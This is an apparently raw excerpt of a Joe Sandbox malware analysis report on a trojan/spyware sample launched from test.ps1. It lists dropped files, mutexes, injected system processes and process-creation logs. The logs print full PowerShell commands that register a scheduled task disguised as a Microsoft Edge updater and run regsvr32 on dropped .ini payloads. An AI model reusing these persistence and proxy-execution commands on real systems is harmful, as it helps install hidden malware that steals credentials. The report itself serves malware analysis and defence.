Source: C:\Windows\System32\dllhost.exe Code function: 15_2_000002913DF1BC68 15_2_000002913DF1BC68
Source: C:\Windows\System32\dllhost.exe Code function: 15_2_000002913DF253C8 15_2_000002913DF253C8
Source: C:\Windows\System32\dllhost.exe Code function: 15_2_000002913DF1737C 15_2_000002913DF1737C
Source: C:\Windows\System32\dllhost.exe Code function: 15_2_000002913DF33B40 15_2_000002913DF33B40
Source: C:\Windows\System32\dllhost.exe Code function: 15_2_000002913DF32AA0 15_2_000002913DF32AA0
Source: C:\Windows\System32\rekeywiz.exe Code function: 16_2_00000260AF5A2D24 16_2_00000260AF5A2D24
Source: C:\Windows\System32\rekeywiz.exe Code function: 16_2_00000260AF5C55B0 16_2_00000260AF5C55B0
Source: C:\Windows\System32\rekeywiz.exe Code function: 16_2_00000260AF5C95D4 16_2_00000260AF5C95D4
Source: C:\Windows\System32\rekeywiz.exe Code function: 16_2_00000260AF5D0D90 16_2_00000260AF5D0D90
Source: C:\Windows\System32\rekeywiz.exe Code function: 16_2_00000260AF592628 16_2_00000260AF592628
Source: C:\Windows\System32\rekeywiz.exe Code function: 16_2_00000260AF5C4DE8 16_2_00000260AF5C4DE8
Source: C:\Windows\System32\rekeywiz.exe Code function: 16_2_00000260AF5AF618 16_2_00000260AF5AF618
Source: C:\Windows\System32\rekeywiz.exe Code function: 16_2_00000260AF5914D0 16_2_00000260AF5914D0
Source: C:\Windows\System32\rekeywiz.exe Code function: 16_2_00000260AF5C0478 16_2_00000260AF5C0478
Source: C:\Windows\System32\rekeywiz.exe Code function: 16_2_00000260AF5CECE4 16_2_00000260AF5CECE4
Source: C:\Windows\System32\rekeywiz.exe Code function: 16_2_00000260AF5ADCE4 16_2_00000260AF5ADCE4
Source: C:\Windows\System32\rekeywiz.exe Code function: 16_2_00000260AF5B6D18 16_2_00000260AF5B6D18
Source: C:\Windows\System32\rekeywiz.exe Code function: 16_2_00000260AF5AE398 16_2_00000260AF5AE398
Source: C:\Windows\System32\rekeywiz.exe Code function: 16_2_00000260AF5D6434 16_2_00000260AF5D6434
Source: C:\Windows\System32\rekeywiz.exe Code function: 16_2_00000260AF5CCC00 16_2_00000260AF5CCC00
Source: C:\Windows\System32\rekeywiz.exe Code function: 16_2_00000260AF5A5ADC 16_2_00000260AF5A5ADC
Source: C:\Windows\System32\rekeywiz.exe Code function: 16_2_00000260AF5A7270 16_2_00000260AF5A7270
Source: C:\Windows\System32\rekeywiz.exe Code function: 16_2_00000260AF5D0270 16_2_00000260AF5D0270
Source: C:\Windows\System32\rekeywiz.exe Code function: 16_2_00000260AF5CF1D0 16_2_00000260AF5CF1D0
Source: C:\Windows\System32\rekeywiz.exe Code function: 16_2_00000260AF5B0174 16_2_00000260AF5B0174
Source: C:\Windows\System32\rekeywiz.exe Code function: 16_2_00000260AF5CE984 16_2_00000260AF5CE984
Source: C:\Windows\System32\rekeywiz.exe Code function: 16_2_00000260AF5C3A38 16_2_00000260AF5C3A38
Source: C:\Windows\System32\rekeywiz.exe Code function: 16_2_00000260AF59C25C 16_2_00000260AF59C25C
Source: C:\Windows\System32\rekeywiz.exe Code function: 16_2_00000260AF5C4A50 16_2_00000260AF5C4A50
Source: C:\Windows\System32\rekeywiz.exe Code function: 16_2_00000260AF5D3A4D 16_2_00000260AF5D3A4D
Source: C:\Windows\System32\rekeywiz.exe Code function: 16_2_00000260AF5C48D0 16_2_00000260AF5C48D0
Source: C:\Windows\System32\rekeywiz.exe Code function: 16_2_00000260AF5D0874 16_2_00000260AF5D0874
Source: C:\Windows\System32\rekeywiz.exe Code function: 16_2_00000260AF5B7094 16_2_00000260AF5B7094
Source: C:\Windows\System32\rekeywiz.exe Code function: 16_2_00000260AF5CF940 16_2_00000260AF5CF940
Source: C:\Windows\System32\rekeywiz.exe Code function: 16_2_00000260AF5C5918 16_2_00000260AF5C5918
Source: C:\Windows\System32\rekeywiz.exe Code function: 16_2_00000260AF5C3F70 16_2_00000260AF5C3F70
Source: C:\Windows\System32\rekeywiz.exe Code function: 16_2_00000260AF5BD854 16_2_00000260AF5BD854
Source: C:\Windows\System32\rekeywiz.exe Code function: 16_2_00000260AF5CA81C 16_2_00000260AF5CA81C
Source: C:\Windows\System32\rekeywiz.exe Code function: 16_2_00000260AF5AD010 16_2_00000260AF5AD010
Source: C:\Windows\System32\rekeywiz.exe Code function: 16_2_00000260AF5ABEB8 16_2_00000260AF5ABEB8
Source: C:\Windows\System32\rekeywiz.exe Code function: 16_2_00000260AF5B86B4 16_2_00000260AF5B86B4
Source: C:\Windows\System32\rekeywiz.exe Code function: 16_2_00000260AF5B3EA4 16_2_00000260AF5B3EA4
Source: C:\Windows\System32\rekeywiz.exe Code function: 16_2_00000260AF5C5EC8 16_2_00000260AF5C5EC8
Source: C:\Windows\System32\rekeywiz.exe Code function: 16_2_00000260AF5B7684 16_2_00000260AF5B7684
Source: C:\Windows\System32\rekeywiz.exe Code function: 16_2_00000260AF5A6F24 16_2_00000260AF5A6F24
Source: C:\Windows\System32\rekeywiz.exe Code function: 16_2_00000260AF5AC750 16_2_00000260AF5AC750
Source: Joe Sandbox View Dropped File: C:\Users\user\AppData\Roaming\4smg.ini BE86E0357748F3B4FA166342F284800A83C955C2C8B197475C2450613A6EED67
Source: Joe Sandbox View Dropped File: C:\Users\user\AppData\Roaming\oSyU.ini 55A451457DBC1F6D28A4C1AB2D477FBBFAE002999A0789C9F3D1BD6610511D98
Source: Joe Sandbox View Dropped File: C:\Users\user\Desktop\utox_x86_x64.exe D7BD224B2EF0014C679046C917BECFFACE5F5ABA2FBDB7DD3C17FE964C3CEE97
Source: C:\Users\Public\ajbs50ul.bat Code function: String function: 00007FF79E99D4B0 appears 72 times
Source: C:\Users\Public\ajbs50ul.bat Code function: String function: 00007FF79E987290 appears 129 times
Source: C:\Users\Public\ajbs50ul.bat Code function: String function: 00007FF79E98C9D0 appears 64 times
Source: C:\Users\Public\ajbs50ul.bat Code function: String function: 00007FF79E950EF0 appears 40 times
Source: C:\Users\Public\ajbs50ul.bat Code function: String function: 00007FF79E987030 appears 31 times
Source: C:\Users\Public\ajbs50ul.bat Code function: String function: 00007FF79E99C954 appears 41 times
Source: C:\Users\Public\ajbs50ul.bat Code function: String function: 00007FF79E987520 appears 48 times
Source: C:\Users\Public\ajbs50ul.bat Code function: String function: 00007FF79E907EF0 appears 224 times
Source: ajbs50ul.bat.1.dr Static PE information: Number of sections : 11 > 10
Source: 4smg.ini.3.dr Static PE information: Number of sections : 11 > 10
Source: utox_x86_x64.exe.1.dr Static PE information: Number of sections : 21 > 10
Source: 7.2.regsvr32.exe.13129ac0.3.raw.unpack, Redist.cs Cryptographic APIs: 'TransformFinalBlock'
Source: 7.3.regsvr32.exe.2d84fa0.6.raw.unpack, Redist.cs Cryptographic APIs: 'TransformFinalBlock'
Source: 7.2.regsvr32.exe.2d84fa0.0.raw.unpack, Redist.cs Cryptographic APIs: 'TransformFinalBlock'
Source: 7.3.regsvr32.exe.2d84fa0.7.raw.unpack, Redist.cs Cryptographic APIs: 'TransformFinalBlock'
Source: 7.2.regsvr32.exe.1b880000.4.raw.unpack, Redist.cs Cryptographic APIs: 'TransformFinalBlock'
Source: classification engine Classification label: mal100.troj.spyw.evad.winPS1@28/22@3/31
Source: C:\Users\Public\ajbs50ul.bat Code function: 3_2_00007FF79E9485F0 memset,FormatMessageW,GetLastError, 3_2_00007FF79E9485F0
Source: C:\Users\Public\ajbs50ul.bat Code function: 3_2_00007FF79E957140 CreateToolhelp32Snapshot,memset,Module32FirstW,Module32NextW,UnmapViewOfFile,CloseHandle,UnmapViewOfFile,CloseHandle,CloseHandle, 3_2_00007FF79E957140
Source: C:\Users\user\Desktop\utox_x86_x64.exe Code function: 8_2_00614FA0 CoInitialize,CoInitialize,CoCreateInstance,CoCreateInstance,CoUninitialize,PeekMessageA,SetEvent,SetEvent,GetMessageA,GetMessageA,CoUninitialize,SetEvent,SetEvent, 8_2_00614FA0
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\Public\ajbs50ul.bat
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2508:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6584:120:WilError_03
Source: C:\Windows\System32\regsvr32.exe Mutant created: NULL
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3664:120:WilError_03
Source: C:\Windows\System32\regsvr32.exe Mutant created: \Sessions\1\BaseNamedObjects\cbRHd
Source: C:\Users\user\Desktop\utox_x86_x64.exe Mutant created: \Sessions\1\BaseNamedObjects\uTox
Source: C:\Windows\System32\rekeywiz.exe Mutant created: \Sessions\1\BaseNamedObjects\MUTEX
Source: C:\Windows\System32\OpenWith.exe Mutant created: \Sessions\1\BaseNamedObjects\MSCTF.Asm.{00000009-4fb3f26-9d18-66b568-627b8a85e4b6}
Source: C:\Windows\System32\regsvr32.exe Mutant created: \Sessions\1\BaseNamedObjects\Jason_OsodJpavasJmnlndsto
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_d0rpsldo.xy0.ps1
Source: C:\Windows\System32\OpenWith.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_Processor
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File read: C:\Users\desktop.ini
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CA
Source: OpenWith.exe, 0000000B.00000003.1599427862.000001BD8812D000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 0000000B.00000003.1601684073.000001BD8812D000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 0000000B.00000003.1631714527.000001BD8812D000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 0000000B.00000003.1758061652.000001BD8812D000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 0000000B.00000003.1662054663.000001BD8812D000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 0000000B.00000003.1788512707.000001BD8812D000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 0000000B.00000003.1607930303.000001BD8812D000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 0000000B.00000003.1616514622.000001BD8812D000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 0000000B.00000003.1621950664.000001BD8812D000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 0000000B.00000003.1602503505.000001BD8812D000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 0000000B.00000003.1614824639.000001BD8812D000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name=='sqlite_sequence';
Source: OpenWith.exe, 0000000B.00000003.1599427862.000001BD8812D000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 0000000B.00000003.1601684073.000001BD8812D000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 0000000B.00000003.1631714527.000001BD8812D000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 0000000B.00000003.1758061652.000001BD8812D000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 0000000B.00000003.1662054663.000001BD8812D000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 0000000B.00000003.1788512707.000001BD8812D000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 0000000B.00000003.1607930303.000001BD8812D000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 0000000B.00000003.1616514622.000001BD8812D000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 0000000B.00000003.1621950664.000001BD8812D000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 0000000B.00000003.1602503505.000001BD8812D000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 0000000B.00000003.1614824639.000001BD8812D000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: INSERT INTO %Q.%s VALUES('index',%Q,%Q,#%d,%Q);
Source: OpenWith.exe, 0000000B.00000003.1599427862.000001BD8812D000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 0000000B.00000003.1601684073.000001BD8812D000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 0000000B.00000003.1631714527.000001BD8812D000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 0000000B.00000003.1758061652.000001BD8812D000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 0000000B.00000003.1662054663.000001BD8812D000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 0000000B.00000003.1788512707.000001BD8812D000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 0000000B.00000003.1607930303.000001BD8812D000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 0000000B.00000003.1616514622.000001BD8812D000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 0000000B.00000003.1621950664.000001BD8812D000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 0000000B.00000003.1602503505.000001BD8812D000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 0000000B.00000003.1614824639.000001BD8812D000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';'FROM main.sqlite_master WHERE type = 'table' AND name!='sqlite_sequence' AND coalesce(rootpage,1)>0
Source: OpenWith.exe, 0000000B.00000003.1599427862.000001BD8812D000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 0000000B.00000003.1601684073.000001BD8812D000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 0000000B.00000003.1631714527.000001BD8812D000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 0000000B.00000003.1758061652.000001BD8812D000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 0000000B.00000003.1662054663.000001BD8812D000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 0000000B.00000003.1788512707.000001BD8812D000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 0000000B.00000003.1607930303.000001BD8812D000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 0000000B.00000003.1616514622.000001BD8812D000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 0000000B.00000003.1621950664.000001BD8812D000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 0000000B.00000003.1602503505.000001BD8812D000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 0000000B.00000003.1614824639.000001BD8812D000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: UPDATE "%w".%s SET sql = sqlite_rename_parent(sql, %Q, %Q) WHERE %s;
Source: OpenWith.exe, 0000000B.00000003.1599427862.000001BD8812D000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 0000000B.00000003.1601684073.000001BD8812D000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 0000000B.00000003.1631714527.000001BD8812D000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 0000000B.00000003.1758061652.000001BD8812D000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 0000000B.00000003.1662054663.000001BD8812D000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 0000000B.00000003.1788512707.000001BD8812D000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 0000000B.00000003.1607930303.000001BD8812D000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 0000000B.00000003.1616514622.000001BD8812D000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 0000000B.00000003.1621950664.000001BD8812D000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 0000000B.00000003.1602503505.000001BD8812D000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 0000000B.00000003.1614824639.000001BD8812D000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: UPDATE sqlite_temp_master SET sql = sqlite_rename_trigger(sql, %Q), tbl_name = %Q WHERE %s;
Source: OpenWith.exe, 0000000B.00000003.1599427862.000001BD8812D000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 0000000B.00000003.1601684073.000001BD8812D000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 0000000B.00000003.1631714527.000001BD8812D000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 0000000B.00000003.1758061652.000001BD8812D000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 0000000B.00000003.1662054663.000001BD8812D000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 0000000B.00000003.1788512707.000001BD8812D000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 0000000B.00000003.1607930303.000001BD8812D000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 0000000B.00000003.1616514622.000001BD8812D000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 0000000B.00000003.1621950664.000001BD8812D000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 0000000B.00000003.1602503505.000001BD8812D000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 0000000B.00000003.1614824639.000001BD8812D000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: UPDATE %Q.%s SET sql = CASE WHEN type = 'trigger' THEN sqlite_rename_trigger(sql, %Q)ELSE sqlite_rename_table(sql, %Q) END, tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqlite_autoindex%%' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
Source: OpenWith.exe, 0000000B.00000003.1624834776.000001BD8778D000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 0000000B.00000003.1629342418.000001BD8779A000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
Source: OpenWith.exe, 0000000B.00000003.1599427862.000001BD8812D000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 0000000B.00000003.1601684073.000001BD8812D000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 0000000B.00000003.1631714527.000001BD8812D000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 0000000B.00000003.1758061652.000001BD8812D000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 0000000B.00000003.1662054663.000001BD8812D000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 0000000B.00000003.1788512707.000001BD8812D000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 0000000B.00000003.1607930303.000001BD8812D000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 0000000B.00000003.1616514622.000001BD8812D000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 0000000B.00000003.1621950664.000001BD8812D000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 0000000B.00000003.1602503505.000001BD8812D000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 0000000B.00000003.1614824639.000001BD8812D000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: SELECT 'DELETE FROM vacuum_db.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name='sqlite_sequence'
Source: test.ps1 ReversingLabs: Detection: 23%
Source: utox_x86_x64.exe String found in binary or memory: impossible: unknown friend-add error
Source: utox_x86_x64.exe String found in binary or memory: -h --help Shows this help text.
Source: utox_x86_x64.exe String found in binary or memory: Search/Add Friends
Source: OpenWith.exe String found in binary or memory: ext-ms-win-security-authz-helper-l1-1-0.dll
Source: OpenWith.exe String found in binary or memory: api-ms-win-stateseparation-helpers-l1-1-0.dll
Source: unknown Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\test.ps1"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Users\Public\ajbs50ul.bat "C:\Users\Public\ajbs50ul.bat"
Source: C:\Users\Public\ajbs50ul.bat Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" "Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute \"regsvr32\" -Argument \"/s /i:INSTALL C:\Users\user\AppData/Roaming/4smg.ini\") -Trigger (New-ScheduledTaskTrigger -Once -At (Get-Date).AddMinutes(1) -RepetitionInterval (New-TimeSpan -Minutes 1)) -TaskName 'MicrosoftEdgeUpdateTaskMachineUA{C804C8C0-8CC0-4804-C048-00888CC0048C}' -Description 'Default' -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DontStopIfGoingOnBatteries)"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown Process created: C:\Windows\System32\regsvr32.exe C:\Windows\system32\regsvr32.EXE /s /i:INSTALL C:\Users\user\AppData/Roaming/4smg.ini
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Users\user\Desktop\utox_x86_x64.exe "C:\Users\user\Desktop\utox_x86_x64.exe"
Source: C:\Windows\System32\regsvr32.exe Process created: C:\Windows\System32\OpenWith.exe "C:\Windows\system32\openwith.exe"
Source: C:\Users\Public\ajbs50ul.bat Process created: C:\Windows\System32\regsvr32.exe "regsvr32" /s /i:INSTALL C:\Users\user\AppData/Roaming/4smg.ini
Source: C:\Windows\System32\OpenWith.exe Process created: C:\Program Files\Windows Media Player\wmpnscfg.exe "C:\Program Files\Windows Media Player\wmpnscfg.exe"
Source: C:\Program Files\Windows Media Player\wmpnscfg.exe Process created: C:\Windows\System32\dllhost.exe "C:\Windows\system32\dllhost.exe"
Source: C:\Windows\System32\OpenWith.exe Process created: C:\Windows\System32\rekeywiz.exe "C:\Windows\system32\rekeywiz.exe"
Source: C:\Windows\System32\OpenWith.exe Process created: C:\Windows\System32\rekeywiz.exe "C:\Windows\system32\rekeywiz.exe"
Source: C:\Windows\System32\rekeywiz.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" "Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute \"regsvr32\" -Argument \"/s /i:INSTALL C:\Users\user\AppData/Roaming/oSyU.ini\") -Trigger (New-ScheduledTaskTrigger -Once -At (Get-Date).AddMinutes(1) -RepetitionInterval (New-TimeSpan -Minutes 1)) -TaskName 'MicrosoftEdgeUpdateTaskMachineUA{848CC004-CC00-4888-C000-44488CCC0488}' -Description 'Default' -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DontStopIfGoingOnBatteries)"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown Process created: C:\Windows\System32\regsvr32.exe C:\Windows\system32\regsvr32.EXE /s /i:INSTALL C:\Users\user\AppData/Roaming/oSyU.ini
Source: C:\Windows\System32\rekeywiz.exe Process created: C:\Windows\System32\regsvr32.exe "regsvr32" /s /i:INSTALL C:\Users\user\AppData/Roaming/oSyU.ini
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: appresolver.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: bcp47langs.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: slc.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: sppc.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: propsys.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: linkinfo.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ntshrui.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: srvcli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cscapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: policymanager.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: taskflowdataengine.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wintypes.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cdp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: umpdc.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dsreg.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: onecorecommonproxystub.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: urlmon.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: iertutil.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: netutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rasapi32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rasman.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rtutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mswsock.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: winhttp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: iphlpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dhcpcsvc6.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dhcpcsvc.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dnsapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: winnsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rasadhlp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: fwpuclnt.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: schannel.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mskeyprotect.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ntasn1.dll
